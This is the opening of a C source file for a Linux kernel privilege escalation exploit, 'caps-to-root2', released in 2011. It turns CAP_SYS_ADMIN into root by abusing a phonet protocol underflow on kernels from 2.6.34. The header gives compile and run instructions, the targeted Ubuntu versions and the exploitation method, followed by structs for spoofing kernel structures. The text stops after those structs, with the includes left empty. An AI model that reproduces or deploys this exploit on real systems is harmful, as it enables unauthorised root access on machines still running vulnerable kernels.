/*
* Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) |
* by Joe Sylve |
* @jtsylve on twitter |
* |
* Released: Jan 7, 2011 |
* |
* Based on the bug found by Dan Rosenberg (@djrbliss) |
* only loosly based on his exploit http://www.exploit-db.com/exploits/15916/ |
* |
* Usage: |
* gcc -w caps-to-root2.c -o caps-to-root2 |
* sudo setcap cap_sys_admin+ep caps-to-root2 |
* ./caps-to-root2 |
* |
* Kernel Version >= 2.6.34 (untested on earlier versions) |
* |
* Tested on Ubuntu 10.10 64-bit and Ubuntu 10.10 32-bit |
* |
* This exploit takes advantage of the same underflow as the original, |
* but takes a different approach. Instead of underflowing into userspace |
* (which doesn't work on 64-bit systems and is a lot of work), I underflow |
* to some static values inside of the kernel which are referenced as pointers |
* to userspace. This method is pretty simple and seems to be reliable. |
*/ |
#include |
#include |
#include |
#include |
#include |
#include |
// Skeleton Structures of the Kernel Structures we're going to spoof |
struct proto_ops_skel { |
int family; |
void *buffer1[8]; |
int (*ioctl)( void *, int , long ); |
void *buffer2[12]; |
}; |
struct phonet_protocol_skel { |
void *ops; |
void *prot; |
int sock_type; |
};
Download Full